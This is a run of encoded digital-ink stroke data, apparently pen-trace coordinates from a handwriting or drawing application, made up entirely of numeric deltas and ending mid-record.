0-1,-1-1 1,0 0 0,1 1-1,-1-1 1,0-1 0,1 1-1,4-1 1,3 0-1892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9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78 552,'11'-1'7939,"-11"17"-7065,1-10-658,-1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1 0 0,-2 7 0,-3 19 602,7-28-717,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 0 1,-3 5-1,-6 22 1260,10-30-1338,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 1 1,10-20 417,42-54-291,-44 60-114,0 0 0,0 1-1,1 0 1,1 0 0,0 1 0,1 0 0,0 1 0,1 1 0,0-1 0,0 2-1,1 0 1,0 0 0,0 1 0,17-6 0,-29 12-33,1 0 0,0 1 0,0-1 0,0 0 0,-1 1-1,1 0 1,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0-1,0 1 1,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 1 0,0-1 0,0 1 0,1-1 0,0 4 0,0 1 2,0 1 0,0 0 0,-1 0 0,0 1 0,-1-1 0,1 0 0,-2 10 0,1-6 2,-2 0-10,0 0 0,0-1 0,-1 0 0,0 1 0,-1-1 0,0 0 0,-7 11 0,1 0-12,-10 35-716,16-16-6155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55 1008,'5'-17'3771,"-5"16"-3666,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,-1-1 0,-3-8 1595,4 9-1617,0-1 1,0 1 0,0 0-1,0-1 1,0 1 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,0 0 0,0-1-1,-1 1 1,1 0 0,0-1-1,0 1 1,-1 0 0,1 0-1,0-1 1,-1 1-1,1 0 1,0 0 0,-1 0-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,-7 0 732,-25 5 1155,1 6-1356,0 2 1,1 1-1,-36 22 1,64-34-577,1 0 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 1 0,0-1 1,0 1-1,0 0 1,0 0-1,1 0 0,-1 0 1,-1 5-1,-3 9 32,5-17-69,0 1 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1-1 0,-1 1 1,1 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 0,0 2 1,1 0-2,0 0 0,1 1 0,-1-1 1,1 0-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,1-1 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0-1 0,0 0 1,0 0-1,8 1 0,3-1-54,1-1-1,0 0 1,0-1-1,16-4 1,35-1-2096,-63 6 1294,0-1 0,0 1 0,0-1 0,-1 0 1,1 0-1,0-1 0,-1 1 0,6-3 1,8-3-3892,3 1 1436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0 596,'-10'15'8092,"5"-9"-7691,-1 0-1,1 1 1,1-1-1,-1 1 1,1 0-1,0 0 1,1 1-1,-5 13 0,-3 11 1215,10-27-1453,1 0 0,-1 0-1,-1-1 1,1 1 0,-1 0-1,1-1 1,-1 0 0,-4 7-1,3-7-79,1 0-1,0 1 0,0-1 0,0 1 0,1 0 0,0-1 0,-1 1 1,1 7-1,-10 38 342,10-46-452,1-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1-1,0-1 1,0 1 0,-1-1 0,2 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,5 0 0,-4-1-468,-1 0 0,0 0 1,1-1-1,-1 1 0,0-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,0-1 1,0 1-1,0-1 0,4-3 1,7-2-2688,-1 1 109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9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1720,'2'6'8176,"1"-1"-4210,-1-4-4106,0 0 1,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0-1 0,0 0 0,3 0 0,-3 0-1369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1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36 368,'-9'-6'16094,"10"6"-16069,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,1-2 0,-1-4 383,-1 24-121,-10 7-167,0 55 112,-10-13-117,20-62-110,1-1 1,-1 0-1,1 0 0,-1 0 1,0 1-1,0-1 0,-1 0 1,-2 5-1,3-5 5,-1 0 1,1 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,1 1 0,-2 5 1,2-7-3,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,0-1-1,0 1 0,-3 3 1,3-4-2,0 0-1,0 1 1,0-1 0,0 1-1,0 0 1,0-1 0,1 1-1,-1 0 1,0-1 0,1 1 0,0 0-1,-1 0 1,1 3 0,-11 18 128,11-22-54,-11 24-275,0 17 142,10-35-3685,-3-15-249,-1-22-3861,5 18 4833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50 228,'2'-18'4016,"4"7"-3005,-6 10-923,0 1-1,1-1 1,-1 0 0,0 1 0,0-1-1,1 0 1,-1 1 0,1-1-1,-1 0 1,0 1 0,1-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,1-1-1,-1 1 1,1 0 0,0-1-1,3 0 3696,40 0-1708,-39-1-2049,1 1-1,0-1 1,0 1-1,0 1 1,0-1-1,0 1 1,0 0 0,0 1-1,0-1 1,0 1-1,0 0 1,0 1-1,0-1 1,-1 1-1,1 0 1,0 1-1,-1-1 1,0 1 0,0 0-1,0 0 1,6 5-1,-10-6-25,16 22 150,-16-22-143,-1-1 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 1 0,-1-1 0,1 0 0,0 0 1,0 0-1,0 0 0,0 1 0,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,-1 1 1,-5 6 206,0 0 0,-1-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,0-2 1,-1 0-1,1 0 0,-1 0 0,0-2 0,-1 1 0,-14 3 0,16-6-166,-1 0-1,0 0 0,1-1 1,-12-1-1,-6 0 15,23 1-132,0 1 0,1-1 1,-1 1-1,0 0 0,1 1 1,-1-1-1,1 1 0,-1-1 0,1 1 1,-7 5-1,2-2-1437,6-4 155,9 2-2405,8-12-4647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3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6 804,'0'0'1571,"-12"-1"3499,10 1-4990,1 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0 1 0,-11 28 343,11-21-383,0-8-34,-1 1 0,1 0-1,0-1 1,0 1 0,0 0 0,1 0 0,-1-1-1,1 1 1,-1 0 0,1-1 0,0 1-1,0-1 1,0 1 0,3 4 0,2 9 30,-6-14-33,0-1 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,1 0 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 1 1,3 0-2,-1-1 1,1 0-1,-1 1 1,1-1 0,-1-1-1,1 1 1,0 0 0,0-1-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1-1-1,0 1 1,0-1 0,-1 0-1,4-1 1,8-4 45,-1 0 1,25-14-1,-31 16-20,-8 4-24,1-1-1,0 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 0,-1-1 1,1 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,-1 1 0,1-1 1,-1 0-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,0 0 1,0 0-1,0-1 1,11-25 803,-11 25-721,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,-2-2 1,-4-5 419,-11-7 734,12 13-1135,0 0 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 1 0,-1 0 0,-8 2-1,4-1-85,9-2-17,1 0 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,-1 0 0,-2 2 0,-3 4-176,-8 14 177,11 5-3248,3-25 2976,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1-1-1,0 1 1,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,3 2-3085,4-1 572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3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19 632,'-2'-12'2528,"0"11"-2001,2 1-422,0-1 0,-1 1-1,1 0 1,0-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,-1 0-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,0 0-1,-1 0 1,1-1 0,-1 1-1,1 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,-1 0 0,1 1-1,0-1 1,-1 0-1,1 0 1,-1 1 0,1-1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,-1 1 1,-19 19 1740,18-14-1350,-1 1-1,1-1 1,1 1-1,-1 0 1,0 13-1,-9 41 188,0-19-681,8-22-64,2-20 55,1 1-1,0-1 1,0 1 0,-1-1-1,1 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1-1,1 1 1,-1-1-1,0 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 2 1,10 14-2541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4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1 888,'0'0'156,"-1"0"1,1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1 0-1,1 1 0,0-1 1,-1 0-1,1 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,0 1-1,0-1 0,-1 0 0,1 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 1 0,0-1 0,0 0 1,1 1-1,-1-1 0,0 1 1,17 28 92,-5-6 245,-10-19-486,0 0 1,0 0-1,0 0 0,1 0 1,0-1-1,0 1 0,0-1 1,0 0-1,1 1 1,-1-2-1,1 1 0,6 4 1,-9-7 1,30 15-997,-29-15 801,-1 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1-1 0,9-5-2605,-2 2 1296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4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0 252,'0'0'5153,"-11"8"-2091,8-3-2731,1 0 1,-1 0 0,0 0-1,0 0 1,0-1 0,-1 1-1,1-1 1,-7 6-1,-10 14 727,-39 39 616,44-48-1486,-1 0 0,-13 20 0,-7 3 130,29-32-290,0 0 0,1 1 1,-1 0-1,-7 11 0,-15 13-568,28-30 282,22-21-5965,1-4 899,-12 7 2631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5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13 160,'0'-10'5954,"-2"8"-5816,-1 2 130,0 1-1,0-1 1,0 1-1,0 0 1,0 0 0,0 0-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 1-1,1 0 1,-5 4 0,-33 37 2171,28-29-2043,5-5-134,1 0 0,1-1 0,0 2-1,-5 9 1,6-9 15,-1-1 1,0 0-1,-1 0 0,-6 8 0,10-13-211,-1-1-1,1 1 1,0 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,0 7 0,-10 24 207,10-34-269,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,0 0-1,1 1 1,-1-1-1,1 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0 1-1,1-1 1,-1 0-1,1 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 1-1,0-1 1,0 0 0,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1 0,1 1-1,-1-1 1,0 1-1,0-1 1,1 1-1,1 0 1,2 0-11,0 1 0,1-1-1,-1 0 1,1-1 0,-1 1 0,0-1 0,1 0-1,-1-1 1,1 1 0,6-2 0,9-3-471,10-3-2306,-6-8-4948,-16 10 4811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5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69 688,'0'0'96,"0"1"1,0 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,0-1-1,0 1 0,0 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 0,-1-1 0,1 1 1,-1 0-1,1-1 0,0 1 0,0 0 1,0 0-1,13 11 939,-13-10-1016,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,0 1 0,0 0-1,1-1 1,1 1 0,8 2 78,0 0 0,0-1 1,0-1-1,0 0 0,0 0 0,0-1 0,0-1 0,1 1 0,-1-2 0,0 0 1,0 0-1,-1-1 0,1 0 0,0-1 0,18-9 0,-28 13-67,0-1 0,0 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,-1 1 0,1-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1 0,1 0 0,-1 0-1,1 0 1,-1 1 0,0-1-1,1 0 1,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,-1 0-1,1 0 1,0-1 0,-2-1 158,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,-1 0 0,1 0 1,-1 0-1,-5-4 0,0 2 185,1-1 0,-1 1 0,-1 0 0,1 1 0,0 0 0,-1 0 0,0 0 0,-16-1 0,-5 1 1,27 2-400,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1-1,-1-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-4 3 0,3-2-541,-2 4-202,4 2-5744,1-4 3923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6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39 612,'-5'2'360,"1"0"-1,0 0 1,0 1 0,0 0 0,0-1-1,0 2 1,0-1 0,1 0-1,0 1 1,-1 0 0,1-1-1,1 1 1,-4 6 0,0 9-35,6-19-311,-1 1-1,1 0 1,-1 0-1,1 0 1,0-1-1,-1 1 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,1 0 1,-1 0 0,0-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,1-1 1,-1 1-1,1 0 1,1 1-1,10 13 158,-9-10-160,0-1-1,0 1 1,1-1 0,-1 0 0,1 0-1,0 0 1,0 0 0,1-1-1,-1 0 1,1 0 0,7 4 0,-8-6-9,-1-1 1,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1-1 0,1 0 0,-1 1 0,0-1-1,1-1 1,-1 1 0,0 0 0,0-1 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0 0,-1 0 0,1-1-1,-1 1 1,4-5 0,8-5 15,-13 11-3,0 0 1,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,-1 0 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1 0,0 1 0,1-3-1,4-13 132,-4 17-137,-1 0-1,0-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 1 0,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,0-1-1,-1 1 1,1-1-1,0 1 0,0-1 1,-1 1-1,1-1 1,0 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1 0 0,0-1 1,-1 1-1,0-1 1,0 0 24,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1-19,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,0 1-1,-1-1 1,1 0 0,0 1-1,-1-1 1,1 1-1,-1-1 1,1 1 0,-1 0-1,1-1 1,-1 1 0,0-1-1,-2-11 472,1 11-379,1 0-1,0 1 0,-1-1 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,1 0-1,-1-1 0,1 1 1,-1 0-1,1-3 1,-1 3-5,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 1,-1-1-1,0 1 0,1 0 0,-4-1 0,2-3 185,0 1-241,-25 16 109,-21 19 31,47-30-152,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 4 0,-4 8 64,5-15-97,-1 1 0,1-1 1,0 0-1,0 1 0,-1-1 0,1 0 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 0 1,1 1-1,0-1 0,0 1 0,0-1 1,0 1-1,1-1 0,-1 0 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 1,0 1-1,1-1 0,-1 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 0-1,1 1 0,-1-1 0,0 0 1,1 1-1,-1-1 0,1 0 0,8 12 24,-7-10-20,-1 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,1-1 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 0 0,4 0 0,10-1-1,0-1-1,-1 0 0,18-5 0,-18 3 15,0 1-1,1 0 1,16 1-1,-30 2-48,-1-1 23,-1 1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,-2 0-12,1 1-1,-1 0 1,0 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,0 0 1,0 1 0,0-1-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 5-1,-11 23-2755,1-11-4571,2-13 4991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7 392,'0'0'1995,"-13"-6"6144,12 6-8040,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,1 1 1,-1 0-1,0 1 0,0-1 0,1 0 1,-2 2-1,-17 21-45,17-22 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,1 1-1,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 2 0,11 55-63,-11-57 11,0 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 1,4 0-1,5 1 4,1 0 0,-1-1 1,1 0-1,15-1 0,-17 0 13,-8 0-18,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1-1,-1 1 1,1 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-2 0,2-3 3,-1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 1,-1-9-1,0 15 17,-1 0 0,1 1 0,0-1 0,-1 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,-3-1 0,0 0 120,1 1 0,-1-1 0,0 1 1,0-1-1,1 1 0,-1 0 0,0 1 0,-8-2 0,-12 3-62,-1 0 0,1 2 0,-1 0-1,-27 9 1,50-12-106,1 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,-1 0 1,1 0-1,0 2 0,-10 19-2730,8-17 1582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8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31 1092,'2'-11'4257,"1"9"-4053,-3 2-94,1 0-1,-1 0 0,1 0 0,-1 0 1,0-1-1,1 1 0,-1 0 1,0 0-1,1-1 0,-1 1 1,0 0-1,0-1 0,1 1 1,-1 0-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,6-4 457,-11 5 143,4 0-208,-6 14 260,0 0 35,0 0-1,-1 0 1,-17 23-1,22-34-714,1 1 1,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 6-1,-1 54 322,2-48-365,0 81 20,0-96-95,0 1 0,1-1 1,-1 0-1,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,1-1 0,-1 0 0,2 1 0,-2-1-202,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 1,1 0-1,-1 0-198,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0-1,0-1 1,0-1 0,0-3-2528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50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9 137 896,'0'0'1585,"-1"-29"2762,-1 28-4592,-4-3 2241,15 2 1376,-7-11-1380,16-6-1345,-17 17-643,1 0 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,0 1 0,0-1 0,4-2 0,4-6 21,-9 8-24,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 1,1-1-1,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 1,4-1-1,-3 1-5,0 0-1,5-3-4,-5 3 11,-1 0 0,1 0 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,3 1 1,14-3 1,-15 1 0,0 0-1,0 0 1,0 0-1,0 1 1,0 0-1,0 0 1,0 0 0,0 0-1,0 1 1,0 0-1,0-1 1,0 1-1,0 1 1,0-1-1,0 1 1,4 1-1,4 2 9,-11-5-10,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 1,1 1-1,0-1 1,-1 0-1,0 1 1,1-1-1,-1 2 1,0-2 10,0 49 77,0-46-83,-1-1-1,0 1 1,0 0-1,0 0 1,0 0-1,-1-1 1,0 1-1,1-1 1,-1 1-1,-1-1 1,1 0-1,0 0 1,-1 0-1,1 0 1,-6 4-1,-35 37 182,22-23-203,18-16 14,-1-1-1,1 0 0,-1 0 1,-1 0-1,1 0 0,-8 4 1,11-7 11,0-1-5,0 1-1,-1 0 1,1 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,1 0 0,-1 1-1,0-1 1,1 0 0,-1 0-1,1 1 1,-1-1 0,1 1-1,0-1 1,-1 0 0,1 1-1,0-1 1,0 1 0,0 2-1,35 21 86,-33-23-87,1 0 0,-1 0 0,1-1 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,4 0 0,-4 0-1,1 0 0,-1 0-1,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,0 0 1,4 4-1,12 8-7,-16-12 5,0-1 0,0 1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,-1-1-1,0 1 1,2 3-1,1 7-6,-5-12 13,0 0 0,1-1-1,-1 1 1,0-1 0,0 1 0,1 0 0,-1-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0 0 0,-1-1 0,1 1-1,0 0 1,0-1 0,-1 1 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 0 1,-2 1 0,-5 6 80,0-1 0,0 1 0,-1-1 0,0-1 0,0 0 0,0 0-1,-1 0 1,1-1 0,-1 0 0,0-1 0,-1 0 0,1-1 0,-13 3 0,-27 0 437,15 0-1899,11-3-3762,32-10-201,-5 4 2782,5-2-175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50.9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33 560,'1'-1'245,"-1"1"1,0-1-1,0 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,-1 1-1,1-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 1,0 0-1,-1 1 0,1-1 1,0 1-1,-1-1 0,1 1 1,0 0-1,-1-1 0,1 1 1,-1-1-1,1 1 0,-1 0 1,1-1-1,-1 1 0,0-1 1,-1 1-183,-2-9 2948,4 9-2979,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0 0 0,-1-1-1,1 1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1 0,6 4 359,-1-3-2304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0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54 146 308,'0'0'601,"-10"-1"1160,10 2-1371,-17 2 4104,23 